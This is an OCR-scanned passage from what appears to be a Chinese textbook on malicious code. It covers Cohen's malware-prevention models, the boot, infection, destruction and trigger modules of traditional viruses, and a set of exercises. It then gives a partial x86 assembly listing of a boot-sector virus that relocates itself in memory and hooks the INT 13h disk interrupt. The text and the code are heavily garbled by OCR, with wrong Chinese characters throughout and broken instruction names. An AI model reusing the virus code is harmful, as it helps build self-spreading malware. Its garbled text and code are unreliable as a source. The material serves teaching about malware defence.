码 既 不 能 从 外 部 入 侵 进 来 ,也 不 能 把 系统 内 部 的 恶意 代码 扩散 出 去 。 

当今 的 杀毒 软件 基本 都 文 持 隅 离 功能 ,就 是 这 一 理论 的 具体 实现 。 

(2) 分 隔 模型 。 将 用 户 群 分 割 为 不 能 互相 传递 信息 的 奋 干 封 财 子 集 。 由 于 信息 处 理 流 
的 控制 ,使 得 这 些 子 集 可 被 看 作 是 系统 被 分 割 成 的 相互 独立 的 子 系统 ,使 得 恶意 代码 只 能 感 
染 整 个 系统 中 的 某 个 子 系统 ,而 不 会 在 子 系 统 之 间 进 行 相互 传播 。 

应 用 虚拟 子 网 划分 等 技术 实现 网 络 安全 可 以 实现 分 隔 模型 。 

(3) 流 模 型 。 对 共享 的 信息 流通 过 的 距离 设 定 一 个 阅 值 ,使 得 一 定量 的 信息 处 理 只 能 
在 一 定 的 区 域内 流动 , 若 该 信息 的 使 用 超过 设 定 的 国 值 , 则 可 能 存在 某 种 危险 。 

中 国 市 场 上 曾经 流行 的 隅 离 网 阅 可 以 说 是 对 这 一 模型 的 最 好 践 行 。 

(4) 限制 解释 模型 。 即 限制 兼容 ,采用 固定 的 解释 模式 ,就 有 可 能 不 被 恶意 代码 感染 。 

尽管 IBM 曾经 提出 过 “让 每 台 计 算 机 都 拥有 不 同 的 操作 系统 ”的 想法 ,但 该 模型 到 现在 
还 没有 被 很 好 地 利用 。 微 软 公 司 在 Vista 和 Windows 7 中 通过 限制 HOOK 技术 来 达到 对 
部 分 恶意 代码 的 防范 ,就 部 分 地 使 用 了 该 模型 的 理论 。 在 防范 恶意 代码 实践 中 ,通过 禁用 
Windows 操作 系统 的 WSH(Windows Scripting Host) 服 务 来 限制 脚本 病毒 的 执行 ,也 是 这 
种 防范 原理 的 重要 体现 。 

2. 类 IPM 模型 

农业 上 的 IPM(Integrated Pest Management) 模 型 实质 上 是 一 种 综合 管理 方法 。 它 的 
基本 思想 是 一 个 害虫 管理 系统 是 与 周围 环境 和 害虫 种 类 的 动态 变化 有 关 的 。 它 以 尽 可 能 温 
和 的 方式 利用 所 有 适用 技术 和 措施 治理 害虫 ,使 它们 的 种 类 维持 在 不 足以 引起 经 济 损失 的 
水 平 之 下 。 

可 以 用 农作物 的 病虫害 与 恶意 代码 进行 下 述 类 比 。 

对 农作物 的 害虫 而 言 : 它们 ”寄生 ?在 健康 的 有机体 ”上 ,并 且 ”* 掠 夺 ?” 农 作物 资源 ; 通 
过 有 机 体 间 的 联系 而 侵害 其 他 有 机 体 ; 存在 它们 出 没 的 “痕迹 ”; 通过 伪装 隐藏 上 月 身 ; 由 传 
染 机 制 和 破坏 机 制 所 构成 ,对 农作物 产生 和 危害。 于 是 ,可 以 把 计算 机 程序 或 磁盘 文件 类 比 为 
不 断 生 长 变化 的 植物 ; 把 计算 机 系统 比 作 一 个 由 许多 植物 组 成 的 田园 ; 把 恶意 代码 看 成 是 
侵害 植物 的 害虫 ; 把 计算 机 信息 系统 周围 的 环境 看 作 农 业 事务 处 理 机 构 。 

因此 ,对 恶意 代码 的 遏制 就 可 以 借用 农业 科学 管理 中 已 经 取得 的 成 就 ,如 IPM 模型 。 
虽然 两 者 之 间 存 在 很 大 差别 ,但 它们 都 是 为 了 解决 系统 被 侵害 问题 ,因此 其 防治 策略 和 方法 
类 似 。 

以 上 介绍 的 几 种 防治 恶意 代码 的 理论 模型 虽然 带 有 历史 的 局 限 性 和 应 用 上 的 不 可 能 性 
(例如 ”基本 隔离 模型 ?中 的 “取消 信息 共享 ”, 就 与 目 计 算 机 面世 以 来 几 代 人 梦 霖 以 求 并 为 
之 不 懈 奋 斗 而 实现 的 伟大 目标 之 一 一 一 信息 共享 这 一 应 用 计算 机 的 主要 目的 背道而驰 ,这 
在 现实 中 是 不 可 能 做 到 的 ) ,但 是 这 些 理论 模型 对 于 当前 恶意 代码 的 宏观 防治 仍然 具有 有 益 
的 局 示 作 用 。 

(1) F.Cohen 的 "四 模型 ?说 。 这 种 理论 的 实质 是 限制 控制 权限 和 相对 地 隅 离 用 户 , 尽 
管 要 使 用 的 系统 共享 与 恶意 代码 防护 共存 在 现实 中 是 不 可 能 的 ,但 却 局 示人 们 可 以 通过 综 
合 权 衡 .综合 治理 来 防治 恶意 代码 。 

(2) K. Jones 和 下 . White 的 类 “IPM 模型 ?说 的 启示 。 
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Q@ “寻找 害 虫 生命 周期 中 的 薄弱 环节 并 进行 针对 性 控制 ”。 根 据 恶 意 代 码 的 含义 ,知道 
恶意 代码 会 侵害 磁盘 文件 ,也 能 扩散 和 驻 留 在 存储 介质 上 。 因 此 ,恶意 代码 必定 存在 “ 写 操 
作 ”, 即 恶意 代码 生命 周期 中 的 薄弱 环节 就 是 “ 写 操 作 ”。 由 于 恶意 代码 一 定 会 癌 可 执行 文件 
进行 “ 写 操作 ”或 把 自身 复制 到 存储 介质 或 依附 于 宿主 程序 中 ,因此 遏制 恶意 代码 扩散 的 关 
键 是 防止 “ 写 操 作 ”, 识 别 文件 或 程序 是 否 已 经 包含 了 恶意 代码 的 特征 码 等 。 

色 设计 并 监控 防范 措施 ,使 之 能 适应 各 种 变化 。 一 成 不 变 的 管理 防范 手段 不 足以 彻底 
地 遏制 恶意 代码 的 攻击 。 

G) 不 能 仅仅 针对 那些 具有 和 较 高 价值 的 文件 采取 防范 恶意 代码 的 措施 ,而 应 始终 如 一 地 
对 整个 系统 进行 安全 防护 。 

(4) 越 是 根据 文件 价值 的 大 小 而 采取 不 同 的 安全 措施 ,恶意 代码 的 平均 种 类 就 越 会 增多 。 

@ 过 制 恶 意 代 码 的 核心 是 人 或 管理 上 的 问题 ,而 不 是 技术 上 的 问题 。 


2.6 传统 计算 机 病毒 的 结构 和 工作 机 制 


传统 计算 机 病毒 (以 下 简称 计算 机 病毒 ) 一 般 由 感染 模块 .触发 模块 .破坏 模块 (表现 模 
块 ) 和 引导 模块 ( 主 控 模 块 ) 四 大 部 分 组 成 。 根 据 是 否 被 加 载 到 内 存 ,计算 机 病毒 又 分 为 静态 
病毒 和 动态 病毒 。 处 于 静态 的 病毒 存 于 存储 介质 中 ,一 般 不 能 执行 感染 和 破坏 功能 ,其 传播 
只 能 借助 第 三 方 活动 (如 复制 、 下 载 和 邮件 传输 等 ) 实 现 。 当 病毒 经 过 引导 功能 而 进入 内 存 
后 , 便 处 于 活动 状态 (动态 ) ,满足 一 定 触发 条 件 后 就 开始 进行 传染 和 破坏 ,从 而 构成 对 计算 
机 系统 和 资源 的 威胁 和 毁坏 。 传 统计 算 机 病毒 的 工作 流程 如 图 2-6 所 示 。 计 算 机 静态 病毒 
通过 第 一 次 非 授 权 加 载 , 其 引导 模块 被 执行 , 转 为 动态 病毒 。 动 态 病毒 通过 某 种 触发 手段 不 
断 检 查 是 否 满足 条 件 ,一 旦 满足 则 执行 感染 和 破坏 功能 。 病 毒 的 破坏 力 取决 于 破坏 模块 ,有 
些 病毒 只 是 干扰 显示 、 占 用 系统 资源 或 发 出 怪 音 等 ,而 男 一 些 恶 性 病毒 不 仅 表 现 出 上 述 外 观 
特性 ,还 会 破坏 数据 甚至 摧毁 系统 。 
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2.6.1 引导 模块 


传统 计算 机 病毒 实际 上 是 一 种 特殊 的 程序 ,该 程序 必然 要 存储 在 某 一 种 介质 上 。 为 了 
进行 自身 的 主动 传播 ,病毒 程序 必须 寄生 在 可 以 获取 执行 权 的 寄生 对 象 上 。 就 目前 出 现 的 
各 种 计算 机 病毒 来 看 ,其 寄生 对 象 有 两 种 : 寄生 在 磁盘 引导 刷 区 和 寄生 在 特定 文件 (EXE 
和 COM 等 可 执行 文件 ,DOC 和 HTML 等 非 执行 文件 ) 中 。 巾 于 不 论 是 磁盘 引导 忆 区 还 是 
寄生 文件 ,都 有 获取 执行 权 的 可 能 ,寄生 在 它们 上 面 的 病毒 程序 就 可 以 在 一 定 条 件 下 获得 执 
行 权 ,从 而 得 以 进入 计算 机 系统 ,并 处 于 激活 状态 ,然后 进行 动态 传播 和 破坏 活动 。 

计算 机 病毒 的 寄生 方式 有 两 种 : 采用 蔡 代 法 或 采用 链接 法 。 所 谓 蔡 代 法 ,是 指 病毒 程 
序 用 自己 的 部 分 或 全 部 指令 代码 ,替代 磁盘 引导 悄 区 或 文件 中 的 全 部 或 部 分 内 容 。 链 接 法 
则 是 指 病毒 程序 将 有 目 喘 代码 作为 正常 程序 的 一 部 分 与 原 有 正常 程序 链接 在 一 起 ,病毒 链接 
的 位 置 可 能 在 正常 程序 的 首部 、 尾 部 或 中 间 , 寄 生 在 磁盘 引导 悄 区 的 病毒 一 般 采 取 蔡 代 法 ， 
而 寄生 在 可 执行 文件 中 的 病毒 一 般 采 用 链接 法 。 

计算 机 病毒 寄生 的 目的 就 是 找 机 会 执行 引导 模块 ,从 而 使 自己 处 于 活动 状态 。 计 算 机 
病毒 的 引导 过 程 一 般 包 括 以 下 三 方面 。 

1. 驻 留 在 内 存 中 

病毒 右 要 发 挥 其 破坏 作用 ,一 般 要 驻 留 在 内 存 中 。 为 此 就 必须 开辟 所 用 内 存 空间 或 覆 
盖 系 统 占 用 的 部 分 内 存 空间 。 其 实 , 有 相当 多 的 病毒 根本 就 不 用 驻 留 在 内 存 中 。 

2. 窃取 系统 控制 权 

在 病毒 程序 驻 留 在 内 存 后 ,必须 使 有 关 部 分 取代 或 扩充 系统 的 原 有 功能 ,并 急 取 系统 的 
控制 权 。 此 后 病毒 程序 依据 其 设计 思想 ,隐蔽 自己 ,等待 时 机 ,在 条 件 成 熟 时 ,再 进行 传染 和 
破坏 。 

3. 恢复 系统 功能 


病毒 为 隐蔽 上 月 己 , 驻 留 在 内 存 后 还 有 要 恢复 系统 ,使 系统 不 会 死机 ,只 有 这 样 才能 等 待 时 
机 成 熟 后 ,进行 感染 和 破坏 。 有 的 病毒 在 加 载 之 前 执行 动态 反 跟 踪 和 病毒 体 解 密 功 能 。 

对 于 寄生 在 磁盘 引导 局 区 中 的 病毒 来 说 ,病毒 引导 程序 占有 了 原 系统 引导 程序 的 位 置 ， 
并 把 原 系统 引导 程序 搬移 到 一 个 特定 的 地 方 。 这 样 系统 一 局 动 , 病 毒 引 叶 模 块 就 会 自动 地 
装 和 人 内 存 并 获得 执行 权 , 然 后 该 引导 程序 负责 将 病毒 程序 的 传染 模块 和 发 作 模块 效 人 内 存 
的 适当 位 置 ,并 采取 和 常 驻 内 存 技术 以 保证 这 两 个 模块 不 会 被 履 盖 , 接 看 对 这 两 个 模块 设 定 茶 
种 激活 方式 ,使 之 在 适当 的 时 候 获 得 执行 权 。 完 成 这 些 工 作 后 ,病毒 引导 模块 将 系统 引导 模 
块 妆 入 内存 ,使 系统 在 市 病毒 状态 下 依然 可 以 继续 运行 。 

对 于 寄生 在 文件 中 的 病毒 来 说 ,病毒 程序 一 般 通 过 修改 原 有 文件 ,使 对 该 文件 的 操作 转 
入 病毒 程序 引导 模块 ,引导 模块 也 完成 把 病毒 程序 的 其 他 两 个 模块 驻 留 在 内 存 及 初始 化 的 
工作 ,然后 把 执行 权 交 给 源 文件 ,使 系统 及 文件 在 市 病毒 的 状态 下 继续 运行 。 


2.6.2 感染 模块 


感染 是 指 计算 机 病毒 由 一 个 载体 传播 到 男 一 个 载体 ,由 一 个 系统 进入 男 一 个 系统 的 过 
程 。 这 种 载体 一 般 为 磁盘 或 磁带 , 它 是 计算 机 病毒 赖 以 生存 和 进行 传染 的 媒介 。 但 是 ,只 有 
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载体 还 不 足以 使 病毒 得 到 传播 。 促 成 病毒 的 传染 还 有 一 个 先决 条 件 ,可 分 为 两 种 情况 ,或 者 
称 为 两 种 方式 。 其 中 一 种 情况 是 用 户 在 复制 磁盘 或 文件 时 ,把 一 个 病毒 由 一 个 载体 复制 到 
另 一 个 载体 上 ,或 者 是 通过 网 络 上 的 信息 传递 ,把 一 个 病毒 程序 从 一 方 传递 到 另 一 方 。 这 种 
传染 方式 称 为 计算 机 病毒 的 被 动 传染 。 男 外 一 种 情况 是 以 计算 机 系统 的 运行 以 及 病毒 程序 
处 于 激活 状态 为 先决 条 件 。 在 病毒 处 于 激活 的 状态 下 ,只 要 传染 条 件 满足 ,病毒 程序 能 主动 
地 把 病毒 自 和 号 传染 给 男 一 个 载体 或 男 一 个 系统 。 这 种 传染 方式 称 为 计算 机 病毒 的 主动 
传染 。 

1. 计算 机 病毒 的 传染 过 程 

对 于 病毒 的 被 动 传染 而 言 , 其 传染 过 程 是 随 着 复制 或 网 络 传输 工作 的 进行 而 进行 的 。 
对 于 计算 机 病毒 的 主动 传染 而 言 , 其 传染 过 程 为 : 在 系统 运行 时 ,病毒 通过 病毒 载体 即 系统 
的 外 存储 天 进入 系统 的 内 存储 需 , 然 后 , 稼 驻 内 存 并 在 系统 内 存 中 监视 系统 的 运行 ,从 而 可 
以 在 一 定 条 件 下 采用 多 种 手段 进行 传染 。 

计算 机 病毒 的 传染 方式 基本 可 分 为 两 大 类 ,一 类 是 立即 传染 , 即 病毒 在 被 执行 的 瞬间 ， 
抢 在 答 主 程序 开始 执行 前 感染 磁盘 上 的 其 他 程序 ,然后 再 执行 宿主 程序 。 男 一 类 是 驻 留 在 
内 存 并 伺机 传染 ,内存 中 的 病毒 检查 当前 系统 环境 ,在 执行 一 个 程序 .浏览 一 个 网 页 时 传染 
磁盘 上 的 程序 。 驻 留 在 系统 内 存 中 的 病毒 程序 在 宿主 程序 运行 结束 后 , 仍 可 活动 ,直至 关闭 
计算 机 。 

2. 计算 机 病毒 的 传染 机 制 

当 执 行 或 使 用 被 感染 的 文件 时 ,病毒 就 会 加 载 到 内 存 。 一 旦 被 加 载 到 内 存 ,计算 机 病毒 
便 开始 监视 系统 的 运行 , 当 它 发 现 被 传染 的 目标 时 ,进行 如 下 操作 。 

(1) 根据 病毒 自己 的 特定 标识 来 判断 文件 是 否 已 感染 了 该 病毒 。 

(2) 当 条 件 满 足 时 ,将 病毒 链接 到 文件 的 特定 部 位 ,并存 人 磁盘 中 。 

(3) 完成 传染 后 ,继续 监视 系统 的 运行 ,试图 寻找 新 的 攻击 目标 。 

文件 型 病毒 通过 与 磁盘 文件 有 关 的 操作 进行 传染 ,主要 传染 途径 如 下 。 

(1) 加 载 执 行文 件 。 加 载 传染 方式 每 次 传染 一 个 文件 , 即 用 户 准 备 运 行 的 那个 文件 , 传 
染 不 到 用 户 没 有 使 用 的 那些 文件 。 

(2) 浏览 目录 过 程 。 在 用 户 浏 览 目录 的 时 候 , 病 毒 检查 每 一 个 文件 的 扩展 名 ,如 果 是 适 
合 感染 的 文件 ,就 调用 病毒 的 感染 模块 进行 传染 。 这 样 病毒 可 以 一 次 传染 便 盘 一 个 目录 下 
的 全 部 目标 。DOS 下 通过 DIR 命令 进行 传染 ,Windows 下 利用 Explorer. exe 文件 进行 
传染 。 

(3) 创建 文件 过 程 。 创 建文 件 是 操作 系统 的 一 项 基本 操作 ,功能 是 在 磁盘 上 建立 一 个 
新 文件 。Word 宏 病 毒 就 是 典型 的 利用 创建 文件 过 程 进行 感染 的 恶意 代码 。 这 种 传染 方式 
更 为 隐蔽 狐 独 ,因为 新 文件 的 大 小 用 户 无 法 预料 。 


2.6.3 破坏 模块 


破坏 模块 在 设计 原则 ,工作 原理 上 与 感染 模块 基本 相同 。 在 触发 条 件 满足 的 情况 下 , 病 
毒 对 系统 或 磁盘 上 的 文件 进行 破坏 活动 ,这 种 破坏 活动 不 一 定 都 是 删除 磁盘 文件 ,有 的 可 能 
是 显示 一 串 无 用 的 提示 信息 ; 有 的 病毒 在 发 作 时 ,会 干扰 系统 或 用 户 的 正常 工作 ; 有 的 病 
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毒 一 旦 发 作 , 会 造成 系统 死机 或 删除 磁盘 文件 : 有 的 病毒 发 作 还 会 造成 网 络 的 拥塞 甚至 
准 痪 。 

传统 计算 机 病毒 的 破坏 行为 体现 了 病毒 的 杀伤 力 。 病 毒 破 坏 行 为 的 激烈 程度 取决 于 病 
毒 作 者 的 主观 愿望 和 他 所 具有 的 技术 能 量 。 数 以 万 计 、 不 断 发 展 扩张 的 病毒 ,其 破坏 行为 千 
奇 百 怪 , 难 以 做 全 面 的 描述 。 病 毒 破坏 目标 和 攻击 部 位 主要 有 系统 数据 区 文件、 内 存 、 系 统 
运行 速度 .磁盘 、.CMOS, 主 板 和 网 络 等 。 

但 是 ,在 利益 的 驱使 下 ,2005 年 以 后 的 恶意 代码 的 破坏 行为 已 经 越 来 越 隐 秘 。 新 型 恶 
意 代 码 的 破坏 不 再 是 破坏 系统 .删除 文件 .堵塞 网 络 等 ,而 是 悄悄 地 窃取 用 户 机 器 上 的 信息 
(账号 口令 .重要 数据 .重要 文件 等 ) ,甚至 当 信 息 禄 取 成 功 后 恶意 代码 会 悄悄 地 上 月 我 销毁 ， 
消失 得 无 影 无 踪 。 


2.6.4 触发 模块 


感染 .潜伏 .可 触发 和 破坏 是 病毒 的 基本 特性 。 感 染 使 病毒 得 以 传播 ,破坏 性 体现 了 病 
毒 的 杀伤 能 力 。 大 范围 的 感染 行为 .频繁 的 破坏 行为 可 能 给 用 户 以 重创 ,但 是 ,如 果 它 们 总 
是 使 系统 或 多 或 少 地 出 现 异常 , 则 很 容易 紧 露 。 而 不 破坏 、 不 感染 又 会 使 病毒 失去 其 特性 。 
可 触发 性 是 病毒 的 攻击 性 和 潜伏 性 之 间 的 调整 杠杆 ,可 以 控制 病毒 感染 和 破坏 的 频 度 ,兼顾 

过 于 苛刻 的 触发 条 件 , 可 能 使 病毒 有 好 的 潜伏 性 ,但 不 易 传播 。 而 过 于 宽松 的 触发 条 件 
将 导致 病毒 频繁 感染 与 破坏 ,容易 暴露 ,导致 用 户 做 反 病 毒 处 理 , 也 不 会 有 大 的 杀伤 力 。 

计算 机 病毒 在 传染 和 发 作 之 前 ,往往 要 判断 某 些 特定 条 件 是 否 满足 ,满足 则 传染 或 发 
作 ,否则 不 传染 或 不 发 作 或 只 传染 不 发 作 , 这 个 条 件 就 是 计算 机 病毒 的 触发 条 件 。 实 际 上 病 
毒 采 用 的 触发 条 件 花 样 繁多 ,从 中 可 以 看 出 病毒 作者 对 系统 的 了 解 程度 及 其 丰富 的 想象 力 
和 创造 力 。 目 前 病毒 采用 的 触发 条 件 主 要 有 以 下 几 种 。 

(1) 日 期 触发 。 许 多 病毒 采用 日 期 作为 触发 条 件 。 日 期 触发 大 体 包 括 特 定 日 期 触发 、 
月 份 触发 和 前 半年 /后 半年 触发 等 。 

(2) 时 间 触 发 。 时 间 触 发 包括 特定 的 时 间 触 发 、 染 毒 后 累计 工作 时 间 触 发 和 文件 最 后 
写 和 时间 触发 等 。 

(3) 键盘 触发 。 有 些 病 毒 监视 用 户 的 按键 动作 , 当 发 现 病毒 预定 的 按键 时 ,病毒 被 激 
活 ,进行 某 些 特定 操作 。 键 盘 触 发 包括 按键 次 数 触 发 .组 合 键 触 发 和 热 启 动 触发 等 。 

(4) 感染 触发 。 许 多 病毒 的 感染 需要 某 些 条 件 触 发 ,而 且 相 当 数 量 的 病毒 以 与 感染 有 
关 的 信息 反 过 来 作为 破坏 行为 的 触发 条 件 , 称 为 感染 触发 。 它 包括 运行 感染 文件 个 数 触 发 、 
感染 序数 触发 .感染 磁盘 数 触发 和 感染 失败 触发 等 。 

(5) 启动 触发 。 病 毒 对 计算 机 的 启动 次 数 计数 ,并 将 此 值 作 为 触发 条 件 。 

(6) 访问 磁盘 次 数 触发 。 病 毒 对 磁盘 I/O 访问 的 次 数 进行 计数 ,以 预定 次 数 作为 触发 

(7) CPU 型 号 /主板 型 号 触发 。 病 毒 能 识别 运行 环境 的 CPU 型 号 /主板 型 号 ,以 预定 
CPU 型 号 /主板 型 号 作为 触发 条 件 , 这 种 病毒 的 触发 方式 奇特 罕见 。 

被 计算 机 病毒 使 用 的 触发 条 件 是 多 种 多 样 的 ,而 且 往 往 不 只 是 使 用 上 面 所 述 的 某 一 个 
条 件 ,而 是 使 用 由 多 个 条 件 组 合 起 来 的 触发 条 件 。 大 多 数 病 毒 的 组 合 触 发 条 件 是 基于 时 间 ， 


第 2 章 恶意 代码 模型 及 机 制 | 


再 辅 以 读 写 盘 操 作 ( 按 键 操 作 ) 以 及 其 他 条 件 。 例 如 ， 侵 略 者 ”病毒 的 激发 时 间 是 开机 后 系 
统 运 行 时 间 和 病毒 传染 个 数 成 某 个 比例 时 ,恰好 按 Ctrl 二 Alt 十 Del 组 合 键 试图 重新 局 动 系 
统 , 则 病毒 发 作 。 

病毒 中 有 关 触 发 机 制 的 编码 是 其 敏感 部 分 。 剂 析 病 毒 时 ,如 果 摘 清 了 病毒 的 触发 机 制 ， 
可 以 修改 此 部 分 代码 ,使 病毒 失效 ,这 样 就 可 以 产生 没有 潜伏 性 的 病毒 样本 , 供 反 病毒 研究 
者 使 用 。 


2.7 二 题 

一 、 填 空 题 

1. 当前 ,人 们 用 的 PC、 笔 记 本 电脑 等 符合 模型 。 

2. 关于 恶意 代码 的 预防 理论 体系 ,F. Cohen 提出 了 
和 4 个 预防 理论 模型 。 

3. 从 制作 结构 上 分 析 , 传统 计算 机 病毒 一 般 包 括 、 
和 四 大 功能 模型 。 

4. 传统 计算 机 病毒 的 引导 模块 可 以 使 病毒 从 寄生 的 静态 状态 转换 到 执行 的 动态 状态 ， 
在 这 个 转换 过 程 中 ,引导 模块 主要 做 和 工作 ，。 

5. 基于 模型 设计 的 计算 机 是 不 可 能 被 传统 计算 机 病毒 感染 的 。 

二 、 选 择 题 


1. 世界 上 第 一 台 计 算 机 ENIAC 是 ( ) 模 型 。 
A. 随机 访问 计算 机 
B. 图 灵机 
C. 随机 访问 存储 程序 计算 机 
D. 带 后 人 台 存 储 器 的 随机 访问 存储 程序 计算 机 
2. 某 个 种 群 在 没有 外 来 侵扰 时 ,其 种 群 数量 服从 ( i 


A. 图 灵机 B. 迭代 清 数 C. 高 斯 分 布 D. 微分 系统 
3. 传统 计算 机 病毒 一 般 由 ( )( )( )( ) 四 大 部 分 组 成 。 

A. 感染 模块 B. 触发 模块 C. 破坏 模块 D. 引导 模块 

E. 执行 模块 
4. 传统 计算 机 病毒 生命 周期 中 ,存在 ( ) 和 ( ) 两 种 状态 。 

A. 静态 B. 潜伏 态 C. 发 作 态 D. 动态 
三 、 思 考题 


1. 讨论 互联 网 蠕虫 传播 的 3 种 数学 模型 的 特点 。 

2. 给 定 一 个 十 六 进 制 序列 “0A 0B 01 02”, 计 算 其 在 任意 一 个 十 六 进 制 可 执行 文件 中 出 
现 的 概率 。 

3. 传统 计算 机 病毒 包含 四 大 功能 模块 ,并 且 在 系统 中 病毒 表现 为 静态 和 动态 两 个 状 
态 ,请 叙述 四 大 功能 模块 之 间 的 关系 ,以 及 状态 的 转换 过 程 。 
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传统 型 计算 机 病毒 是 最 原始 的 几 类 计算 机 病毒 ,主要 包括 感染 引导 区 的 病毒 ,感染 可 执 
行程 序 的 病毒 和 感染 数据 文件 的 病毒 。 除 了 本 章 讲 解 的 几 个 计算 机 病毒 外 ,感染 Linux 系 
统 可 执行 程序 的 病毒 也 是 传统 计算 机 病毒 的 一 类 代表 。 基 于 章节 安排 的 考虑 ,Linux 系统 
下 感染 可 执行 文件 的 病毒 放 在 本 书 第 4 章 介 绍 。 

DOS 环境 下 的 病毒 数量 已 经 定格 在 了 5000 多 种 。DOS 平台 是 病毒 编制 者 (VXer) 的 
乐园 ,因为 程序 员 可 以 在 该 平台 下 自由 地 读 、 写 控制 系 统 的 所 有 资源 。Windows 平台 的 出 
现 促使 计算 机 病毒 技术 迅速 向 新 平台 转化 ,Windows 9x( 包 括 Windows 95/98/Me) 平 台 
的 病毒 曾经 繁 采 一 时 ,里 然 Windows 9x 通过 使 用 设备 驱动 和 32 位 程序 来 管理 文件 系统 ， 
给 病毒 编制 市 来 了 一 定 的 及 烦 , 但 是 VXer 们 还 是 分 别 利 用 Ring3 和 Ring0 执行 权限 达到 
了 目的 。 以 NT 内 核 为 基础 的 Windows 2000/NT/2003/XP 等 操作 系统 ,进一步 改进 了 系 
统 的 安全 性 ,此 时 ,虽然 利用 Ring3 执行 权限 的 病毒 可 以 轻松 转 到 新 平台 上 来 ,但 是 进入 
Ring0 难度 进一步 加 大 。 随 着 Windows Vista、Windows 7 等 的 安全 性 进一步 提高 ,利用 
Ring0 执行 权限 的 新 病毒 越 来 越 难 写 , 写 传 统 型 计算 机 病毒 简直 到 了 不 可 能 的 地 步 。 

伴随 看 操作 系统 的 不 断 进 步 , 可 执行 文件 的 格式 也 发 生 了 巨大 变化 。 它 包括 4 个 阶段 : 
DOS 中 以 COM 为 扩展 名 的 可 执行 文件 和 以 EXE 为 扩展 名 的 MZ 格式 的 可 执行 文件 ; 
Windows 3. x 下 出 现 的 NE(New Executable) 格 式 的 EXE 和 DLL 文件 ; Windows 3. x 和 
Windows 9x 所 专 有 的 LE(Linear Executable, 其 专用 于 VxD 文件 ); Windows 9x 和 
Windows NT/2000/XP 下 的 32 位 的 PE(Portable Executable) 格 式 文件 。 总 之 ,COM、MZ 
和 NE 属于 16 位 文件 格式 ,PE 属于 Win32 文件 格式 ,LE 可 以 兼容 16 位 和 32 位 两 种 环境 。 

当 编 制 计算 机 病毒 的 先驱 者 们 痴迷 于 他 们 高 超 的 汇编 语言 搁 术 和 成 果 时 ,可 能 不 会 想 
到 后 继 者 能 以 更 加 简单 的 手法 制造 影响 力 更 大 的 病毒 。 宏 病毒 是 感染 数据 文件 的 病毒 的 典 
型 代表 ,其 中 ,Microsoft Word 宏 病 毒 又 是 宏 病 毒 家 族 中 最 具有 代表 性 的 一 类 。 像 其 他 类 
型 的 病毒 一 样 , 宏 病毒 也 经 历 了 从 产生 到 发 展 , 青 到 衰退 的 过 程 。 曾 经 , 宏 病 毒 感 染 了 世界 
上 几乎 所 有 的 Windows 计算 机 , 占 了 当时 恶意 代码 总 量 的 50%。 

本 草 主 要 介绍 DOS、Windows 平台 下 引导 区 病毒 .可 执行 文件 病毒 ,感染 数据 文件 的 安 
病毒 等 传统 型 计算 机 病毒 ,并 设计 了 多 个 实验 来 展示 这 些 病 毒 。 

本 章 学 习 目 标 

(1) 了 解 COM 、EXE NE、PE 可 执行 文件 格式 。 

(2) 了 解 引 导 型 病毒 的 原理 及 实验 。 

(3) 掌握 COM 文件 型 病毒 的 原理 及 实验 。 

(4) 掌握 PE 文件 型 病毒 及 实验 。 

(5) 和 擎 握 宏 病毒 的 原理 及 实验 。 
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3.1 3 引导 型 病毒 编制 技术 


学 习 本 节 前 建议 先 学 习 人 硬盘 主 引导 区 结构 .掌握 主 引 导 程 序 以 及 DOS 操作 系统 的 中 断 
知识 。 


3.1.1 引导 型 病毒 编制 原理 


20 世纪 90 年 代 中 期 之 前 ,引导 型 病毒 一 直 是 最 流行 的 病毒 类 型 。 直 到 2010 年 3 月 由 
金山 安全 反 病 毒 专家 发 现 了 Windows 系统 下 引导 型 病毒 “ 鬼 影 ”, 这 彻底 颠覆 了 人 们 的 传统 
认识 一 一 Windows 下 不 会 再 有 引导 型 病毒 。 

引导 型 病毒 首先 感染 软盘 的 引导 区 ,然后 再 蔓延 至 人 硬盘 并 感染 硬盘 的 主 引 导 记 录 
(Main Boot Record, MBR)。 一旦 MBR 被 病毒 感染 ,病毒 就 试图 感染 软驱 中 的 软盘 引导 
区 。 引 导 区 病毒 是 这 样 工 作 的 : 由 于 病毒 隐藏 在 软盘 的 第 一 扇 区 ,使 它 可 以 在 系统 文件 装 
入 内 存 之 前 ,先进 入 内 存 , 从 而 获得 对 操作 系统 的 完全 控制 ,这 就 使 它 得 以 传播 并 造成 危害 。 
引导 型 病毒 常常 用 自身 的 程序 蔡 代 MBR 中 的 程序 ,并 移动 扇 区 到 硬盘 的 其 他 存储 区 。 由 
于 PC 开机 后 ,将 先 执行 主 引 导 区 的 代码 ,因此 病毒 可 以 获得 第 一 控制 权 , 在 引导 操作 系统 
之 前 ,完成 以 下 工作 。 

(1) 减少 系统 可 用 最 大 内 存量 ,以 供 自己 需要 。 

(2) 修改 必要 的 中 断 问 量 ,以 便 传播 。 

(3) 读 入 病毒 的 其 他 部 分 ,进行 病毒 的 拼装 。 病 毒 首先 从 已 标记 秘 的 某 届 区 读 入 病毒 
的 其 他 部 分 ,这 些 簇 往往 被 标记 为 坏 秘 ( 但 是 文件 型 病毒 则 不 必 如 此 ,二 者 混合 型 也 不 必 如 
此 )。 然 后 ,再 读 和 信 原 引导 记录 到 0000: 7C00H 处 , 跳 转 执行 。 引 导 型 病毒 的 代码 如 下 。 


mov cl,06h 
shl ax,cl ;ax = 8F80 
add ax, 0840h ;ax = 97c0 
mOV es,ax 
mov si,7c00h ;si = 7c00 
mov di, si 
mov cx, 0100h 
repz movSsw ; // 将 病毒 移 到 高 端 
v2: push ax 
pop ds 
push ax 
mov bx, 7c4bh 
push bx 
ret ; // 指 令 执 行 转 入 高 端 内 存 
call v3 
v3: xor ah,ah ;ah=0 
ES 
mov ah, 80h 
and byte ptr ds:[7df8h],al 
v4: mov bx,word ptr ds:[7df9h] ; // 读 入 病毒 的 其 他 部 分 


push cs 
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pop ax ; ax = 97c0 

sub ax, 20h ; ax = 97a0 

moVv es,ax ; es = 97a0 

call v9 

mov bx, word ptr ds:[7df9h] ;load logic sector id 
inc bx ;bx++1is boot sector 


mov ax, 0ffc0h ;ffc0:8000 = 0000:7c00 // 读 人 原 引 导 分 区 内 容 


mOV es, ax 
call v9 
XoOr ax, ax ;AX=0 
mov byte ptr ds:[7df7h],al ;flag = 0 
v5: mov ds,ax ;ds = 0 
mov ax word ptr ds:[4ch] 
mov bx, word ptr ds:[4eh] ; // 修 改 中 断 和 问 量 
mov word ptr ds :[4ch],7cd6h 
mov word ptr ds :[4eh],cs ;now int13h had been changed 
push cs 
pop ds ;ds = csS 
